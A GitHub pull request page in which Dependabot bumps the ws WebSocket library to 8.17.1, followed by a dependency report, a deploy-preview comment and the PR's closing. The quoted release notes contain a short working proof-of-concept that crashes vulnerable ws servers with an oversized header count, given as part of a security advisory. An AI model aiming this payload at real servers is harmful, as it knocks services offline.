Bedrock-Layouts / Bedrock

Foundational Layout Primitives for your React App
https://bedrock-layout.dev/
MIT License

build(deps): bump ws from 8.17.0 to 8.17.1 #2501

Closed dependabot[bot] closed 1 month ago

dependabot[bot] commented 1 month ago

Bumps ws from 8.17.0 to 8.17.1.

Release notes

Sourced from ws's releases.

8.17.1

Bug fixes

  • Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding the server.maxHeadersCount threshold could be used to crash a ws server.

```js
const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});
```

The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.

In vulnerable versions of ws, the issue can be mitigated in the following ways:

  1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.

... (truncated)

Commits
  • 3c56601 [dist] 8.17.1
  • e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
  • 6a00029 [test] Increase code coverage
  • ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
  • See full diff in compare view


Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
- `@dependabot show ignore conditions` will show all of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)

You can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/Bedrock-Layouts/Bedrock/network/alerts).
socket-security[bot] commented 1 month ago

New and removed dependencies detected. Learn more about Socket for GitHub ↗︎

Package New capabilities Transitives Size Publisher
npm/accepts@1.3.8 None 0 16.8 kB dougwilson
npm/agent-base@7.1.0 network 0 23.5 kB tootallnate
npm/bl@4.1.0 None +3 163 kB matteo.collina
npm/braces@3.0.3 None 0 44.6 kB jonschlinkert
npm/chokidar@3.6.0 environment, filesystem +4 129 kB paulmillr
npm/ci-info@3.9.0 environment 0 26.1 kB sibiraj-s
npm/cli-cursor@3.1.0 None +1 7.19 kB sindresorhus
npm/content-type@1.0.5 None 0 10.5 kB dougwilson
npm/diff-sequences@29.6.3 None 0 46 kB simenb
npm/domhandler@5.0.3 None +1 86.7 kB feedic
npm/dotenv-expand@10.0.0 None 0 13.9 kB motdotla
npm/end-of-stream@1.4.4 None 0 6.23 kB mafintosh
npm/fast-glob@3.3.2 filesystem +1 109 kB mrmlnc
npm/figures@3.2.0 None +1 14.8 kB sindresorhus
npm/fill-range@7.1.1 None +2 49.3 kB jonschlinkert
npm/fsevents@2.3.3 None 0 173 kB pipobscure
npm/get-func-name@2.0.2 None 0 8.68 kB keithamus
npm/has-bigints@1.0.2 None 0 12.8 kB ljharb
npm/has-unicode@2.0.1 environment 0 3.44 kB iarna
npm/iconv-lite@0.4.24 None 0 336 kB ashtuchkin
npm/ini@1.3.8 None 0 9.3 kB isaacs
npm/is-arguments@1.1.1 None 0 28.8 kB ljharb
npm/is-date-object@1.0.5 None 0 20.8 kB ljharb
npm/is-docker@2.2.1 filesystem 0 3.01 kB sindresorhus
npm/is-generator-function@1.0.10 eval 0 31.9 kB ljharb
npm/is-plain-obj@1.1.0 None 0 2.62 kB sindresorhus
npm/is-plain-object@5.0.0 None 0 9.16 kB trysound
npm/is-symbol@1.0.4 None 0 22 kB ljharb
npm/jsonc-parser@3.2.0 None 0 205 kB aeschli
npm/jsonparse@1.3.1 None 0 36.8 kB creationix
npm/kind-of@6.0.3 None 0 22.8 kB doowb
npm/log-symbols@4.1.0 None +1 8.12 kB sindresorhus
npm/merge2@1.4.1 None 0 8.9 kB zensh
npm/micromatch@4.0.5 None 0 55.9 kB jonschlinkert
npm/mime-db@1.52.0 None 0 206 kB dougwilson
npm/mime-types@2.1.35 None 0 18.3 kB dougwilson
npm/min-indent@1.0.1 None 0 2.97 kB thejameskyle
npm/minizlib@2.1.2 None +1 32.1 kB isaacs
npm/negotiator@0.6.3 None 0 27.4 kB dougwilson
npm/neo-async@2.6.2 None 0 298 kB suguru03
npm/normalize-path@3.0.0 None 0 9.22 kB jonschlinkert
npm/p-limit@2.3.0 None +1 11.8 kB sindresorhus
npm/p-map@4.0.0 None +3 25.3 kB sindresorhus
npm/path-scurry@1.10.1 filesystem 0 529 kB isaacs
npm/pathe@1.1.2 None 0 30.8 kB pi0
npm/postcss-value-parser@4.2.0 None 0 27.2 kB evilebottnawi
npm/punycode@2.3.1 None 0 33.5 kB google-wombot
npm/react-is@16.13.1 environment 0 24 kB acdlite
npm/safe-buffer@5.2.1 None 0 32.1 kB feross
npm/safer-buffer@2.1.2 None 0 42.3 kB chalker
npm/set-function-name@2.0.1 None +1 26.9 kB ljharb
npm/signal-exit@3.0.7 None 0 9.96 kB isaacs
npm/slash@3.0.0 None 0 3.51 kB sindresorhus
npm/source-map-js@1.2.0 None 0 140 kB 7rulnik
npm/tar-stream@2.2.0 filesystem +1 29.9 kB mafintosh
npm/through@2.3.8 None 0 12.5 kB dominictarr
npm/type-check@0.4.0 None +1 57.9 kB gkz
npm/type-detect@4.0.8 None 0 42.1 kB chaijs
npm/unpipe@1.0.0 None 0 4.31 kB dougwilson
npm/validate-npm-package-license@3.0.4 None +1 28.4 kB kemitchell
npm/wcwidth@1.0.1 None +2 29.2 kB timoxley
npm/ws@8.17.1 None 0 141 kB lpinca

🚮 Removed packages: npm/@babel/code-frame@7.24.6, npm/@babel/compat-data@7.24.6, npm/@babel/core@7.24.6, npm/@babel/generator@7.24.6, npm/@babel/helper-compilation-targets@7.24.6, npm/@babel/helper-create-class-features-plugin@7.23.10, npm/@babel/helper-create-regexp-features-plugin@7.22.15, npm/@babel/helper-define-polyfill-provider@0.5.0, npm/@babel/helper-environment-visitor@7.24.6, npm/@babel/helper-function-name@7.24.6, npm/@babel/helper-hoist-variables@7.24.6, npm/@babel/helper-member-expression-to-functions@7.23.0, npm/@babel/helper-module-imports@7.24.6, npm/@babel/helper-module-transforms@7.24.6, npm/@babel/helper-plugin-utils@7.22.5, npm/@babel/helper-simple-access@7.24.6, npm/@babel/helper-skip-transparent-expression-wrappers@7.22.5, npm/@babel/helper-split-export-declaration@7.24.6, npm/@babel/helper-string-parser@7.24.6, npm/@babel/helper-validator-identifier@7.24.6, npm/@babel/helper-validator-option@7.24.6, npm/@babel/helpers@7.24.6, npm/@babel/highlight@7.24.6, npm/@babel/parser@7.24.6, npm/@babel/plugin-syntax-jsx@7.23.3, npm/@babel/plugin-transform-class-properties@7.23.3, npm/@babel/plugin-transform-flow-strip-types@7.23.3, npm/@babel/plugin-transform-modules-commonjs@7.23.3, npm/@babel/plugin-transform-nullish-coalescing-operator@7.23.4, npm/@babel/plugin-transform-optional-chaining@7.23.4, npm/@babel/plugin-transform-private-methods@7.23.3, npm/@babel/plugin-transform-react-display-name@7.23.3, npm/@babel/plugin-transform-react-jsx@7.23.4, npm/@babel/preset-typescript@7.23.3, npm/@babel/runtime@7.23.9, npm/@babel/template@7.24.6, npm/@babel/traverse@7.24.6, npm/@babel/types@7.24.6, npm/@eslint-community/regexpp@4.10.0, npm/@floating-ui/utils@0.2.1, npm/@jridgewell/gen-mapping@0.3.3, npm/@radix-ui/react-slot@1.0.2, npm/@storybook/csf@0.1.8, npm/@types/babel__core@7.20.5, npm/@types/babel__traverse@7.20.5, npm/@types/semver@7.5.7, npm/@typescript-eslint/scope-manager@7.12.0, npm/@typescript-eslint/type-utils@7.12.0, 
npm/@typescript-eslint/types@7.12.0, npm/@typescript-eslint/typescript-estree@7.12.0, npm/@typescript-eslint/utils@7.12.0, npm/@typescript-eslint/visitor-keys@7.12.0, npm/@urql/core@4.2.3, npm/@yarnpkg/libzip@2.3.0, npm/array-includes@3.1.7, npm/array.prototype.flat@1.3.2, npm/array.prototype.flatmap@1.3.2, npm/assert@2.1.0, npm/available-typed-arrays@1.0.6, npm/browserslist@4.23.0, npm/call-bind@1.0.7, npm/caniuse-lite@1.0.30001591, npm/chalk@2.4.2, npm/chromatic@11.5.1, npm/commitizen@4.3.0, npm/concat@1.0.3, npm/core-js-compat@3.35.1, npm/cosmiconfig@8.3.6, npm/cssnano@7.0.1, npm/cz-conventional-changelog@3.3.0, npm/define-data-property@1.1.4, npm/es-abstract@1.22.4, npm/es-shim-unscopables@1.0.2, npm/esbuild@0.20.2, npm/eslint-config-prettier@9.1.0, npm/eslint-config-react-app@7.0.1, npm/eslint-plugin-functional@6.5.1, npm/eslint-plugin-import@2.29.1, npm/eslint-plugin-jsx-a11y@6.8.0, npm/eslint-plugin-prettier@5.1.3, npm/eslint-plugin-react-hooks@4.6.2, npm/eslint-plugin-react@7.34.2, npm/eslint-plugin-storybook@0.8.0, npm/eslint@8.57.0, npm/espree@9.6.1, npm/fs-extra@11.2.0, npm/function.prototype.name@1.1.6, npm/get-intrinsic@1.2.4, npm/glob@10.3.10, npm/has-property-descriptors@1.0.2, npm/hasown@2.0.1, npm/husky@9.0.11, npm/i18next-browser-languagedetector@7.2.1, npm/i18next-http-backend@2.5.2, npm/i18next@23.11.5, npm/import-sort-style-module@6.0.0, npm/inquirer@8.2.5, npm/internal-slot@1.0.7, npm/istanbul-lib-report@3.0.1, npm/istanbul-reports@3.1.6, npm/jsdom@24.1.0, npm/jsonfile@6.1.0, npm/lerna@8.1.3, npm/lilconfig@3.1.1, npm/lint-staged@15.2.5, npm/magic-string@0.30.7, npm/minify@11.2.0, npm/minimatch@3.1.2, npm/minimist@1.2.7, npm/node-fetch@2.7.0, npm/object.assign@4.1.5, npm/object.fromentries@2.0.7, npm/object.values@1.1.7, npm/parse-json@5.2.0, npm/postcss-cli@11.0.0, npm/prettier-plugin-import-sort@0.0.7, npm/prop-types@15.8.1, npm/react-dom@18.3.1, npm/react-i18next@14.1.2, npm/react-test-renderer@18.3.1, npm/recast@0.23.6, npm/rimraf@5.0.7, 
npm/scheduler@0.20.2, npm/semver@7.6.0, npm/solid-js@1.8.17, npm/solid-styled-components@0.28.5, npm/storybook@8.1.5, npm/styled-components@6.1.11, npm/terser@5.28.1, npm/ts-node@10.9.2, npm/tsconfig-paths@4.2.0, npm/typescript-eslint@7.12.0, npm/v8-to-istanbul@9.2.0, npm/vite-plugin-solid@2.10.2, npm/vite-plugin-turbosnap@1.0.3, npm/vite@5.2.12, npm/vitest@0.34.6

View full report↗︎

netlify[bot] commented 1 month ago

Deploy Preview for admiring-yalow-f522c7 ready!

Name Link
Latest commit 589e73ff85a4c2cf87a138980ffd61b2e3b4e942
Latest deploy log https://app.netlify.com/sites/admiring-yalow-f522c7/deploys/667201f773fd3c00080b2031
Deploy Preview https://deploy-preview-2501--admiring-yalow-f522c7.netlify.app

To edit notification comments on pull requests, go to your Netlify site configuration.

dependabot[bot] commented 1 month ago

Looks like ws is up-to-date now, so this is no longer needed.